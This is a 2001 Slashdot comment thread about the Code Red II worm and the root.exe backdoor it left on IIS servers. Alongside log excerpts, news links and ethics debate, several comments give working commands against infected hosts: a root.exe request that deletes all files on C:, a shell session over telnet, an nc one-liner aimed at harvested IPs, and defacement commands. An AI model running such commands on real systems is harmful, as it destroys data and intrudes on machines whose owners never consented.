    I tried pulling up a few IP's logged in my apache logs and this is what I got for most of them: The page cannot be displayed There are too many people accessing the Web site at this time. HTTP 403.9 - Access Forbidden: Too many users are connected Internet Information Services Technical Information (for support personnel) Background: This error can occur if the Web server is busy and cannot process your request due to heavy traffic. 90% of them are unsecured computers on the @home 24.x.x.x network.

    1. Re:Try pulling the IP up in your browser by Pathwalker · · Score: 2

      I've been having fun with that myself - I have a list of everyone who hit me here.
      Lots are home users who probably don't realize that they have IIS running, but there are a few sites that look like decent sized places.

  225. A prediction by nugatory · · Score: 2
    http:// {infected ip here } /scripts/root.exe?/c%20del%20/Q%20/F%20/S%20c:\*.*

    It's not if as many /.ers need to be told about the existence of the DEL command, and the intellectual leap required to recognize that the ability to execute an arbitrary command implies the ability to execute a particular command seems rather modest to me.

    But before we mod this down as an insult to the intelligence of the /. readership, there is a more interesting issue: This particular inspiration is going to occur to a fair number of vandals, kiddies, and assorted undersocialized individuls. Many of them will do something more destructive with it than posting it to slashdot. More generally, the level of sophistication needed to attack a CRII-compromised machine is low, much lower than even script-kiddie level, low enough that any moderately determined wolfcub with a bent hairpin and a telnet client can do tremendous damage.

    Thus, CRII has suddenly created and widely advertised a pool of very vulnerable machines. It would not be surprising to find that the worst damage is done by vandals following along behind CRII, just as looters follow behind natural disasters.

  226. Ummm, no actuall by kfg · · Score: 4, Funny

    If you take the water away completely and hold the frog over the heat sorce itself it will roast.

    Sorry, I'm "in a mood" today and I couldn't help myself.

    Still, it's interesting. If you put the frog in cold water and slowly turn up the heat what it will do, being cold blooded, is go to sleep long before it dies and *poaches.*

    What is the relevance and why should anyone care? Lobster.

    The correct way to cook a lobster, not matter what *anyone* tells you, is to put it in cold water and bring the heat up. The lobster relaxes and goes to sleep before it cooks.

    If you just dump it in hot water it goes " Eeeeeeeeeeee," tightens up all of its muscles and pumps lactic acid throughout its system before it dies.

    Starting in cold water is both more humane and results in quite noticably tastier lobster.

    KFG

    1. Re:Ummm, no actuall by waveman · · Score: 2, Insightful

      Even more relaxed lobsters and nicer food if you float the lobsters in wine until they become unconscious. We did this once and the results were excellent

  227. If you're a nice guy by CTho9305 · · Score: 1

    http://infected_machine/scripts/root.exe?/c+ren+cm d.exe+worm.exe I've been told trying to delete cmd.exe gives access denied - maybe its attrib +r+s or something. This one works for sure

  228. OK so far 74 this half hour!! by windowsLuser · · Score: 1

    Someone on the 24.x.x.x domain (@home) is ineffected bad with this thing I'm not even running a server. I'm just surfing to day, Zone alarm is going crazy reporting attacks to different ports. What gives I thought this was a port 80 thing?

    --
    This is a Sig, there are many like it but this one is mine! I wish I had more than 120 chars... whats a char?
    1. Re:OK so far 74 this half hour!! by LinuxHam · · Score: 1

      Zone alarm is going crazy reporting attacks to different ports. What gives I thought this was a port 80 thing?

      I was wondering the same thing when looking at my snort firewall logs.. I figured it out when I decided to pull up a web page off of one of the IP's "attacking" on a high port -- Slashdot came up!

      Your firewall is only looking for the signature of the attack to come across the wire. Yours, like mine, is not differentiating between which port the payload is destined for on your machine. It sees the attack sequence come in on a web page, and its been posted plenty of times, and your firewall points it out. Can any snort gurus tell us what to change to make it only look for the payload coming in on port 80?

      --
      Intelligent Life on Earth
    2. Re:OK so far 74 this half hour!! by Anonymous Coward · · Score: 0
      Ok here's a sample zone alarm report, ip address changed to protect the stupid:

      The firewall has blocked Internet access to your computer (HTTP) from 24.0.0.0 (TCP Port 3619) [TCP Flags: S]. Time: 8/5/01 7:46:54 PM

      I believe that zone alarm is doing is showing that the initial connection was made to port 80, the (HTTP) section. Then, like most connections, the attacking computer and my computer negotiate an upper level port to continue communication, the 3619 port.

      IIRC, communication with tcp is initiate on a standard port, in this case 80, but further communications occur on a port negotiated by the two computers, in this case 3619. This is fairly standard and it is why multiple clients can connect to one server without confusion. Each client uses an upper level port after the communication is established.

      Anyone else want to elaborate?

  229. Best Downloadz Ever by dozing · · Score: 1

    According to some of the posts I've been seeing a lot of the infected machines are on cable-modem users. Due to the nature of this new beast we have access to all these infected servers. Cable-modem users due to their high bandwidth tend to have some of the best downloadz. It sounds to me like this is just Napster Version 2.

    --
    Dozings.com -- Its kinda funny... If you're as crazy as me.
  230. How to get a list of all infected hosts by braddock · · Score: 2, Interesting
    So I have this log of about 100 CR2 hosts who have attacked my web server, and each of those infected hosts have probably got records of 100 other hosts that have tried to reinfect them in their logs. If I snarf all their logs, I'll have 10,000 compromised hosts that I've got root access on. Do it one more level, and I've got every compromised machine on the internet. How long until some kiddie scripts that up?



    OR, one group could patch all those infected hosts...or at least notify the admins.



    I've got a full analysis of this at http://braddock.com/cr2.html

    1. Re:How to get a list of all infected hosts by p_trinli · · Score: 1

      Every host had seven posts. Every post has seven flames. Every flame had seven lines. Hosts, posts, flames, lines, how many trolling on Slashdot?

  231. Maybe not that new. by Evro · · Score: 1

    This happened to me on 7/23/01, so I don't know how new it really is. Now time to format that damn win2k box :-(

    --
    rooooar
  232. Maybe we have the *responsibility* by pdcull · · Score: 1

    ...to shut down these systems now?

    Think about, folks - I'm no script kiddie, but using information posted on /. under this article, I grabbed the URL of an infected system and using my Internet Explorer (on Win95 no less) was able to do a DIR C:\ on aforementioned system (following the instructions in a posting here on /.).

    Surely that means that Slashdot is contributing to the problem by making all the necessary information available where any script kiddie can find it.

    Now that we've made that information available, surely we have a responsibilty to at the least remotely shut down the systems so that they aren't at further risk until the owners see them tomorrow morning?

    Now of course, that may be still considered 'hacking' so is there a suitable government or non-government organization which could legally do this?

  233. In other news... by wrinkledshirt · · Score: 2, Funny

    ...timothy and cmdr Taco both showed up to work today wearing matching golf shirts and Dockers pants. Upon further inspection, it was determined that they also had the exact same type of socks, shoes, and belts (they stopped short of comparing underoos). At some point, Hemos was quoted as saying, "You know, I think you two should talk to each other before coming in to work."

    --

    --------
    Bleah! Heh heh heh... BLEAH BLEAH!!! Ha ha ha ha...

    1. Re:In other news... by p_trinli · · Score: 1

      Honestly, how hard is it to check the past X posts before posting a story? Yeesh. Just imagine if real journalists did this.

    2. Re:In other news... by Anonymous Coward · · Score: 0

      it's called an op-ed.

    3. Re:In other news... by p_trinli · · Score: 1

      No, it's called carelessness.

  234. Foster parents for software by TheMightyZog · · Score: 1

    What really needs to be done is setup a software protective services agency, similar to child protective services. If the parent (company) is caught abusing (repeated instances of lack of security, total lack of concern for the end users of the software, etc) the child, the child (software with source code) is taken from them and placed with foster parents (another company) that have the child's (software's) best interests in mind.

    I see the first children being Outlook and IIS.

  235. Your Mission, Should you Decide to Accept it... by Greyfox · · Score: 2
    Set Apache up so when it sees a code red probe (get default.ida blah blah blah) telnets to that machine's port 80 and shuts down the web server.

    Extra credit: Disinfect the machine with the security patch from the MS Web Site.

    As this would be completely passive (Rather than patching the code red code) it should be slightly less dangerous than releasing a new worm to the net. And since it would affect only machines that have already been compromised, it should be slightly less ethically questionable than patching the worm code to do something new and the releasing it. I'm sure I'll get flamed for suggesting it nonetheless...

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

  236. Re:Imagine? Nah... by Anonymous Coward · · Score: 0

    Start using the root.exe to leave files on their hard drives. I left one one some poor admin's desktop, "youwerehitbyCodeRedII,pleasereformatandpatchyouse ver" Ah... I was too lazy to add spaces. Hopefully it would be enough to scare them -- the unfortunate souls don't know their servers are broadcasting that they have a backdoor...

  237. Aural Feedback by Aldurn · · Score: 3, Interesting

    I was curious just how often RedCode attacks. Sure, looking through the apache log files is nice, but it just didn't give me the sense of urgency... the quick succession at which attacks take place. So, I whipped up a quick perl script to play a noise every time I was "attacked". Needless to say, it's getting kind of annoying, but it still is incredible:

    #!/usr/bin/perl
    while(1) {
    system("cat /var/log/your-access.log | grep XXXXXXXXXXXXX | cut -d \" \" -f 1 | wc -l > attacks_b");
    $returnval = system("diff attacks_a attacks_b > /dev/null");
    if(0!=$returnval) {
    system("cp -f attacks_b attacks_a");
    system("play buzzer2.aiff &");
    }
    sleep(1);
    }

    --
    char sig[120] = "\0"
    1. Re:Aural Feedback by chrome · · Score: 1
      Yup, that works really well. And, if you replace the line

      system("play buzzer2.aiff &");

      With

      system("cat /usr/dt/appconfig/sounds/C/rooster.au > /dev/audio &");

      It will even work on solaris. Quite scary how many roosters I have behind my sofa! :)
  238. A thought... by Anonymous Coward · · Score: 0

    I've read most of the discussion on this over today and my net connection is pretty much fux0red thanks to folks on my ISP who don't patch their s/w. I agree writing a virus to propogate and patch the holes in IIS servers is a great idea, but there's always the chance you'll get a slap on the wrists for that - and is anyone willing to risk it?

    What I've done instead is set up a mime type for ida files to be handled as PHP, written a pretty simple default.ida that basically refreshes to http://$REMOTE_ADDR?/c+iexplore+http://www.jado.or g/codered.html

    http://www.jado.org/codered.html being a little file that says "Hi, you've got Code Red dumbass, fix your PC cos it attacked mine :)" and includes a link to Symantecs site on Code Red C (complete with patch) - oh, and a link to mine because it gets 0 hits and I figure if this works it's a good way to get traffic :)

    Whether or not Code Red is stupid enough to attack the box, wait for a response, then let itself get redirected to another site is another matter - so will it work? I dunno :) I guess I'll find out next time one of the buggers attacks my machine.

    I'm guessing what I've done (assuming it even has an effect) is legal? At worst grey-area stuff (since my machine is just responding to a request from thiers).

    Oh, and it's late and I'm tired - English is my first language but I'm almost asleep writing this, sorry if it's a bit discombobulated :)

    --
    Jado.
    The loneliest site on the net

    1. Re:A thought... by Anonymous Coward · · Score: 0

      Nah, course it didn't work :) I've written another one that just uses fsockopen to connect to the host as soon as it hits default.ida and send "GET blah blah blah" to open iexplore to the warning page, maybe this un will work. I'll post the [mediocre 2 lines of]code if it does (and anyone is interested) Jado.

  239. A Warning to Whitehats by Ms.Taken · · Score: 5, Informative
    Anyone working on scripts which respond to Code Red attacks by patching the originating server should read this cnet article, which calls that approach 'hack-back'.

    From the article:

    The FBI has dismissed using any hack-back tactic as well. "It is not something that we could consider," said spokeswoman Debbie Weierman. "It would basically be viewed as an unauthorized intrusion."

    It's not clear from the article whether such an 'unauthorized intrusion' by a private citizen would be illegal, but it might be worth thinking about before you go riding out to do battle with the Red Worm.

    1. Re:A Warning to Whitehats by MagicM · · Score: 1

      From that article:

      "Instead of fixing buggy software, the focus should be on locking down computer systems to prevent activity that could be compromising, said Randy Sandone, CEO of security software maker Argus Systems Group."

      Ok so there's a company I'll never trust software from again...

    2. Re:A Warning to Whitehats by Glytch · · Score: 2

      I don't know what Mr. Sandone considers "locking down computer systems to prevent activity that could be compromising", but shouldn't that include fixing buggy software?

  240. Let me get this straight by blakestah · · Score: 2

    Let me make sure I understand this one.

    I grep \?XXX from /var/log/apache/access.log

    grep \?XXX /var/log/apache/access.log | mawk '{print($1) }'

    Then, for each result, I can telnet to port 80 and remote root the machine with a single get request for scripts/cmd.exe ??

    I have 45 such hits in my log files, mostly from machines at my ISP. That is truly ridiculous.

  241. SirCam Got Some Press!!! by E-Rock-23 · · Score: 1

    It was just a tiny mention, and it was in a little hickville newspaper, but SirCam finally got some print attention. Of course, it was in a Code Red article, which was careful to let the sticks dwellers know that as long as they didn't use NT or 2000 (why would they?) they were safe. I myself recieved SirCam, but since my e-mail client doesn't use scripts, I was safe. Now, if the mainstream net media could only see that we, the wee users, are in more trouble than the big bad companies...

    --
    Blog Prophyts - Right On, Man
  242. Now that I've got access to hundreds of boxes by rjamestaylor · · Score: 2
    how can I alert these losers to the problem?

    Here's where I got:

    [root@yy-yy-yy-y-yy user]# telnet xx.x.xx.xxx 80
    Trying xx.x.xx.xxx...
    Connected to xxx-xx-x-xx-xxx.co.sprintbbd.net (xx.x.xx.xxx).
    Escape character is '^]'.
    GET /scripts/root.exe HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Sun, 05 Aug 2001 21:42:59 GMT
    Content-Type: application/octet-stream
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    c:\inetpub\scripts>
    Suggestions? (Non-destructive, please, the goal is to alert not hurt)
    --
    -- @rjamestaylor on Ello
    1. Re:Now that I've got access to hundreds of boxes by E-Rock-23 · · Score: 1

      Can you get to their HTML? Replace their main page with one that says something like "This server is poorly secured and has been infected with CodeRedII. Please e-mail the administrator and tell them to remedy this solution." And save a copy of the original index file so they can go right back to using it. Just a thought.

      --
      Blog Prophyts - Right On, Man
    2. Re:Now that I've got access to hundreds of boxes by Anonymous Coward · · Score: 2, Funny
      White hat way:
      GET /scripts/root.exe?\c start [helpful info site]
      GET /scripts/root.exe?\c net send 127.0.0.1 You have Code Red! Patch your webserver, dammit!

      Black hat way:
      GET /scripts/root.exe?\c start http://goatse.cx/
      GET /scripts/root.exe?\c net send 127.0.0.1 j00 h4v3 b33n 0wn3d by [your name here]! u sux0r! 1 r0x0r!
      GET /scripts/root.exe?\c echo h4x0r3d by [your name here] > ..\index.html

      Weirding Way:
      GET /scripts/root.exe?\c start [Dune website]
      GET /scripts/root.exe?\c net send 127.0.0.1 We've got wormsign!

  243. White Hat Viruses? by VValdo · · Score: 2

    With all those destructive virus-writers groups and everything, you'd think by now there'd be an Illuminati-type secret organization of white hat programmers somewhere out there that cripple viruses and release a "serum" strain to innoculate systems and close MS's holes.

    It would be illegal of course, but, well, Robin Hood broke the law too.

    (I'm not advocating this of course, just thinking it's curious no such organization exists)
    W

    --
    -------------------
    This is my SIG. There are many like it, but this one is mine.
    1. Re:White Hat Viruses? by Thurn+und+Taxis · · Score: 1

      If the organization is secret, how do you know it doesn't exist? The only logical answer is that you're a member of this secret, supposedly non-existent organization, and you're trying to keep us in the dark! So there!

      --
      On stereophonic equipment, the monaural sound obtained through multiple channels will enhance your listening pleasure.
    2. Re:White Hat Viruses? by Thurn+und+Taxis · · Score: 1

      As an aside, adding my .sig to the top of any web page (without the tags) should annoy most people running virus checkers.

      --
      On stereophonic equipment, the monaural sound obtained through multiple channels will enhance your listening pleasure.
    3. Re:White Hat Viruses? by Thurn+und+Taxis · · Score: 1

      Okay, I guess /. filters .sigs. Go to this page to see the code that virus checkers object to.

      --
      On stereophonic equipment, the monaural sound obtained through multiple channels will enhance your listening pleasure.
  244. Microsoft has been infected by Anonymous Coward · · Score: 0


    The Code Red 2 worm has gotten into the MS corporate network and is running loose behind their firewall. Their internal IIS servers are attacking each other.

  245. Apache users Create default.ida 5mb!!!! by darkharlequin · · Score: 1

    Slow them down!!!!!!

    --
    i am so very tired....
    1. Re:Apache users Create default.ida 5mb!!!! by Just+Jeff · · Score: 1

      No, but you can make /default.ida a CGI script which just sleeeeeeeeeeeeeps. Of course, that ties up your network resources too...

    2. Re:Apache users Create default.ida 5mb!!!! by Anonymous Coward · · Score: 3, Interesting

      Or you could setup default.ida as a perl script that telnets to the ip's 25 port and sends an email with the fact they have a box thats screwed.. like the guy did here.

    3. Re:Apache users Create default.ida 5mb!!!! by Anonymous Coward · · Score: 0

      But that assumes that there is an SMTP server at port 25, which is often not the case since Microsoft never included one by default in Windows NT; it is an add-on product.

      It was that kind of crazy decision that drove me to *nix.

  246. I have a funnier story by sxpert · · Score: 1

    It's even better for me, my own ISP (noos.net) has machines that are currently attacking me... see the log below :

    212.198.0.93 - - [05/Aug/2001:08:59:41 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 283 "-" "-"
    guess what... this is "curie.noos.net", part of my ISP's systems

  247. Correction by Ms.Taken · · Score: 1

    Sorry that link should have been to the FAQ referenced in the article. The FAQ's old (July 31), but the basics still apply.

  248. Re: How to be a nicer guy by Anonymous Coward · · Score: 1, Informative

    http://IP.IP.IP.IP/scripts/root.exe?+/c+start+%20h ttp://www.digitalisland.com/codered/

    Find & run websnarf.pl or grab the IP's off your web logs, run this on the IP of whoever attacks with v2 (XXXXXXXXXXXXXXXXXX) and you're set. It's easier, I think, since it gives them more info (starts their browser & points them to info on CR, though I wish it had more info on how to remove the *trojan* which will not disappear with the patch :/ since it also creates the /c and /d aliases to *keep* them infected...)

    I do wish we could autopatch these, but this is the next best thing, since it's not harmful (unlike the format c: ideas some are having... *sigh* ...)

    If someone comes up with an autopatch script which grabs the logs from websnarf, then telnets in & fixes them up, I'm open to ideas here...

  249. I cant believe... by nick-less · · Score: 1
    Trying 212.143.77.136...
    Connected to 212.143.77.136.
    Escape character is '^]'.
    GET /scripts/root.exe?/c+dir+c:\
    HTTP/1.1 200 OK
    Server: Microsoft-IIS/5.0
    Date: Sun, 05 Aug 2001 23:04:17 GMT
    Content-Type: application/octet-stream
    Volume in drive C has no label.
    Volume Serial Number is 10D1-32F6

    Directory of c:\

    08/05/2001 11:06p 289 default.asp
    08/05/2001 11:06p 289 default.htm
    08/05/2001 07:17p Documents
    and Settings 08/05/2001 11:06p 289 index.asp
    08/05/2001 11:06p 289 index.htm
    08/05/2001 11:06p Inetpub
    08/05/2001 06:54p Program Files
    08/05/2001 07:29p WINNT
    4 File(s) 1,156 bytes
    4 Dir(s) 4,975,837,184 bytes free
    Connection closed by foreign host.
    Did anyone else notice the date? This Server is a fresh installation and already infected again... These guys must be punished....
    1. Re:I cant believe... by Anonymous Coward · · Score: 0
      LOL! I hear what you're saying, but think about his fer a sec. All CodeRedII does is 'sploit the box and scan for others. It's very possible, if not probable, that other pissed off users on the net, after getting scanned by offending boxen, are getting their default.htm changed, and other messages like: "fix your spewing backdoored boxen, you dolt".

      What would you do with 400 thousand rooted neted boxen available at your keyboard?

  250. Now I can try and /. myself :-) by GC · · Score: 2

    I've been recording the hits of V1 and V2 from my machine since early this afternoon, thanks to a very handy Perl script provided by another Slashdot user.

    You can find the results and a link to the script here

  251. Damnit, it wouln't bite....only 8k dl'd by get by darkharlequin · · Score: 1

    this sucks... I wanted to tie the servers up, but actually, now that I think of it, this will flood the network more...oops....

    --
    i am so very tired....
  252. I am not a robot by ryanr · · Score: 2

    Though I feel like one about now... long night. :)

    Those are going to a shared e-mail alias. I get copies of everything, as well as a few other people. Unfortunately, because they are coming in many format types, we have to compile them by hand. But absolutely, please do send us the logs and have them in the format requested.

    1. Re:I am not a robot by fuckallnerds · · Score: 0

      hahaahaha!!!

  253. Would someone please inform the media! by braddock · · Score: 1

    Shesh, I keep waiting for cnn, abc, cbs, bbc, SOMEONE to report that the internet's security has just been turned to swiss cheese, but all of them are still headlining stories that their technology editor wrote before going home for the weekend about how "The Red Tide receeds", and "Code Red virus not so bad...kinda soft and cuddly".

    Visions of thousands of password packet sniffers kicking in Monday morning on CR2 backdoored systems dance in my head....

    1. Re:Would someone please inform the media! by sonnik · · Score: 1

      You know, I was also thinking that this would be a good thing to inform the media of.

      I don't like the incoming requests to my @Home service (inhibits performance and lessens my ability to detect legitimate attacks).

      I am overwhelmed by the total number of idiots who are still running insecure IIS on their always on cable modems.

      What's the consensus? Call the media or no?

    2. Re:Would someone please inform the media! by sonnik · · Score: 1

      At least the AP has an article,

      http://dailynews.yahoo.com/h/ap/20010805/tc/code _r ed_1.html

  254. Help! Need to chop my file with sed? by BawbBitchen · · Score: 1

    So if figured this out....maybe they will see it? echo GET /scripts/root.exe?/c+copy+c:\winnt\clock.avi+c:\yo uhavecodered.txt | telnet %1 80 Seems like a good idea. So anyone help me get the IP's out of my access_log so I can feed 'em to the script. I am not to good with sed so.. Some command to grep the access_log for the .ida and then get the IP and put it in a test file? grep -E \.ida /var/www/log/access_log Then???

  255. stupid post but by Anonymous Coward · · Score: 0

    how come the FBI or another goverment agency hasn't bothered to get about the buznuzz of tracking down who wrote this? (if that's even possible?)

  256. Working PHP counter by Heretic2 · · Score: 1

    Yea, so, I noticed on my 20 IP multi-homed linux server I was getting a lot of hits, so I here's my answer. Notice the confirmation log.

    Now what's the W2K command to change the IP to 10.1.2.3?

  257. Logging the worm by The_Weevil · · Score: 1

    I am currently logging the attacks on my btopenworld ADSL box by using a dummy default.ida script.

    The results are on display here (until my dyndns changes).

    Viral code sent is stored in my database and different code variants are logged. I only started logging today.

    It is obvious from the stats that V2 is enjoying bt openworld's subnet very much, since all my attacks so far have come from within there.

    Weevil

    --
    ghaa.
    1. Re:Logging the worm by The_Weevil · · Score: 1

      It wasn't difficult. I just told apache to execute all .ida files in public_html as if they were perl scripts (by setting the ExecCGI flag for *.ida).

      Then I placed a dummy default.ida in there, so whenever the worm tries to attack it the attempt is logged to a mysql database. Releasing the code would be tricky as you'd also need to set up the database, which would be a right nightmare but mail me if you're serious and I'll send you a copy. It ain't pretty.

      I also pushed the boat out after realising how many v2 attacks I was getting and created a /scripts/root.exe script too, to log 1337 h4x0rs trying to get into my non-existant win2k server :)

      On the COX front, from what I've been able to gather the codered II virus spreads predominantly over subnets. If my logging in the past few days is anything to go by, v1 is as good as dead, but the far more virulent v2 is busy infecting all win2k machines on its particular subnet; notice how many attacks I got from other BT Openworld customers. This sounds like exactly the problem your co-worker is seeing.

      I'm not sure I want to be slashdotted, but the URL that will bounce you to my gateway and these logs is: www.baxpace.com/gateway -- you'll have to copy and paste it if you're seriously interested. Hey, I still want to be able to get online :).

      Soon I'll add a frequency chart to it so that I can see how the level of attacks per hour is changing since logging began.

      Thanks for the interest
      Weevil

      --
      ghaa.
  258. This looks big time by JerkyBoy · · Score: 2, Informative

    Holy crap. http://www.msnbc.com/news/606910.asp

    --


    Always do right. This will gratify some people and astonish the rest. -- Mark Twain
    1. Re:This looks big time by pdcull · · Score: 1

      REFORMATTING ONLY CURE

      In his analysis, Cooper said the only way victims can reclaim a compromised system is to reformat it, essentially wiping it clean. That's because there's no way to tell if a vulnerable computer has been implanted with other back doors.

      He forgot the phrase and install a more secure operating system right after the bit about reformating the infected system.

    2. Re:This looks big time by Dr.+A.+van+Code · · Score: 1
      "One guy posted to the DShield.org mailing list that he installed IIS Win2k from scratch. To be safe, he had his server disconnected from the Net, but had to connect it to download the patches," Ullrich said. "During the 45 seconds it took him to download the patches he was infected."

      Excuse me? If he knew of the danger, WHY THE HELL did he have IIS running when he connected to the net to get the patches?? Did he think he needed the web _server_ running in order to use the web _browser_??

      --
      Good mfences make good neighbors.
  259. Hypothetical question by Anonymous Coward · · Score: 0

    If Code Red III was released now after all these root shells have been exposed, what is the worst thing that it could do on a large scale?

    1. Re:Hypothetical question by gamorck · · Score: 0

      They are not rootshells. The shell placed in the directory only has the level access that you give the anonymous internet user account (technically the account IIS runs under). If the anonymous internet user account is admin - then anybody exploiting root.exe has admin rights.

      Gam
      "Flame at Will"

      --
      I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
    2. Re:Hypothetical question by Anonymous Coward · · Score: 0

      I could see someone creating a worm that sent out a 4k Code Red type of worm which could then download a larger file from the infecting machine and install it as a service or something.

  260. affects every email user? by gimpboy · · Score: 1

    how does sircam affect every email user? shouldnt you say it affects every outlook user who has scripting enabled and is ignorant enough to open attachments they are not expecting?

    personally i think a root exploit that is broadcast to everyone on your subnet is worse. especially if your subnet is on @home.

    --
    -- john
    1. Re:affects every email user? by Chris+Johnson · · Score: 2
      I'd say having hundreds of megabytes to download over a 56K modem constitutes 'affecting' me :P

      I send you this file to have your advice!

    2. Re:affects every email user? by Anonymous Coward · · Score: 0

      You ignorant M$ basing Linux Zealot. SirCam spreads in an attached EXE, has nothing to do with Outlook and Scripting.

  261. IMA_FUCKING_MORON.sh by Anonymous Coward · · Score: 0

    cat access_log | grep default.ida | cut -d ' ' -f 1 | awk '{printf("echo \"GET /scripts/root.exe?/c+mkdir+c:\IMA_FUCKING_MORON\" | nc %s 80\n", $1);}' > IMA_FUCKING_MORON.sh

  262. It's easy to secure your IIS.. by Telek · · Score: 1
    When I first installed my server, I decided to tie it down, and here's what I did:

    • Changed the user that IIS ran under to a dummy user that only has READ access to the scripts directory and any other directory that it needs access to, and specifically granted WRITE access to places that it needed to write to, and NO access to the rest of the system
    • Removed all mappings that I wasn't using
    • placed a fake CMD.EXE in the scripts directory that I wrote that SMS'ed me with information whenever it was executed (and the directory was read only anyways so you couldn't overwrite it). This was fun, because as soon as someone tries to execute the cmd.exe, it fails and emails me about the attempt).

    So after the code-red and the other one a while back came out, I found out about it as soon as the first attack hit my system (via email) and then checked my logs and was pleased to see many attempts, but no change at all. I'm not trying to be arrogant here, I just wanted to point out that it is possible to secure your IIS (or any system for that matter) so that stupid bugs won't compromise your system.
    --

    If God gave us curiosity
    1. Re:It's easy to secure your IIS.. by Anonymous Coward · · Score: 0
      Re: "It's easy to secure your IIS"

      (pardon the caps, but I'm pissed)
      YOU'RE OVERLOOKING THE OBVIOUS FACT THAT HUNDREDS OF THOUSANDS OF SERVERS AROUND THE GLOBE HAVE BEEN ROOTED AND BACK DOORED.

  263. This is just the first wave by analog_line · · Score: 1
    Though admittedly it's coming along a lot faster than most. What we have here boys and girls are our own little hacker nanites. How long before a version of this comes out exploiting a security flaw where there is no patch for it? How long until a version comes out that tries more than one vulnerability?

    As a certain commercial operating system gets more an more bloated, larger and larger files are less noticed. How long before a 1-2MB virus with a couple dozen attack types built in starts making the rounds?

  264. This is old news... by jezerbel · · Score: 1

    I know, I know - but seriously: I had to patch this on our Win2k machine back in March/April - I'm presuming that this is the Solaris/Windows thing (site must have been slashdotted) or a variant of (forgive my ignorance if I'm wrong). Either way it overwrote the default pages and gave the user some system access - using echo commands to write to files etc... now where was that freakin' link to prove it...

    Either way this was what the server logs looked like..

    /msadc/../../../../../../winnt/system32/cmd.exe /c+dir+..\ 200 0 871 99 70 HTTP/1.0 - - - -
    /msadc/../../../../../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 0 401 129 90 HTTP/1.0 - - - -

    somebody tell me if this is a different bug (but even so the exploit looks similar...)

    1. Re:This is old news... by gamorck · · Score: 0

      Thats different worm actually. The Solaris/IIS worm was called Sadmind. That is different than code red. Code Red exploits a newer POST SP2 vulnerability known as the IDA exploit. Sadmind used the old (from May) PRINTER exploit.

      I suggest you download the latest MS hotfix. Your server is most likely infected if you didnt patch since the last big worm.

      On a side note: Please keep up to date on security when it comes to the systems you are managing. Perhaps if more people tried that tactic - viruses like Code Red wouldnt be such a big deal. Whatever you do at this point - dont admit that you are MCSE certified - that will only make things worse for you.

      Gam
      "Flame at Will"

      --
      I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
    2. Re:This is old news... by gamorck · · Score: 0

      Sorry about that - the Sadmind worm used the unicode exploit - not the PRINTER exploit. Either way - get off your ass and patch the damn machine.

      Note: Sorry for being so bitchy but my machine has already been attacked 529 times today alone by codered - I've had enough of this shit.

      Gam
      "Flame at Will"

      --
      I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
    3. Re:This is old news... by jezerbel · · Score: 1

      He he I believe it was the Printer exploit - quite true.. You don't have to worry about me keeping the server patched - is all in the bag - and no, im not MSCE so my authority on the subject may be questionable... thanks for the correction.

    4. Re:This is old news... by jad0 · · Score: 1

      There was a very similar exploit out in 99, I only remember the year because there was a 'client' for it called NCX99 - I can't remember where, who or why, but I've still got NCX99 lying around somewhere, it used exactly the same technique, buffer overflow with junk characters, then arbitrary code (on an htx file though IIRC).

      As far as I know, noone made a 'proper' self-replicating virus out of it though.

      --
      Jado
      http://www.jado.org

  265. Anti-Code Red Virus by dankjones · · Score: 1
    I've been thinking it would be pretty damn neat if some programmer out there who was fed up with all this Code Red hype wrote up an anti-code red virus that would track down all the infected servers clean them up and patch them, and then, on a certain date/time delete itself.

    It could be known as the "Your Welcome" virus.

    Unfortunately, I don't know diddly-shit about it.

    1. Re:Anti-Code Red Virus by Anonymous Coward · · Score: 0

      I have looked at this, and found the access granted to the user running the root.exe script has limited permissions. I attempted to run the route command to make the infected server loose its route to the internet. I was given a permission error. Anybody have any other ideas of what we can do to make these machines useless ( I am getting more hits from the code red worm than real hits now)

  266. 213.77.4.237 has been attacking me and by ssimpson · · Score: 2

    ....proudly sports the "Powered by Win2000 Server logo".

    I fucking know that you are running Win2k server, that's why you're infected with code red and attacking my poor linux box ;)


    --
    "Mary had a crypto key, she kept it in escrow, and everything that Mary said, the Feds were sure to know."
  267. potential for something worse by rips · · Score: 1

    If someone wrote a worm that maintained encrypted peer-to-peer connections between machines or arbitrary ports and a host routing table (gnutella style), this worm would suddenly shift shape into something potentially a lot worse.

    If this was then coupled with a self-propagating plug-in system requiring public-key encryption to install plug-in modules, the worm's creator could effectively initiate and propagate counter attacks and defensive measures.

    I find this an intriguing but incredibly scary concept.

  268. New Sites report on CR2 by stuccoguy · · Score: 4, Informative
    CNN has very little to say about the subject.

    MSNBC has a longer story.

    Fox News has a few words to say.

    ABC copied the AP story.

    CBS still seems to think the red tide is receeding.

    Meanwhile the worm has knocked on my computer's door six times since I started this post. Uh, make that seven.

    1. Re:New Sites report on CR2 by GC · · Score: 1

      uh huh... I hear ya knocking, but ya can't come in... Apache... ya ya ya.

  269. Prelude to the BIG ONE by Anonymous Coward · · Score: 0

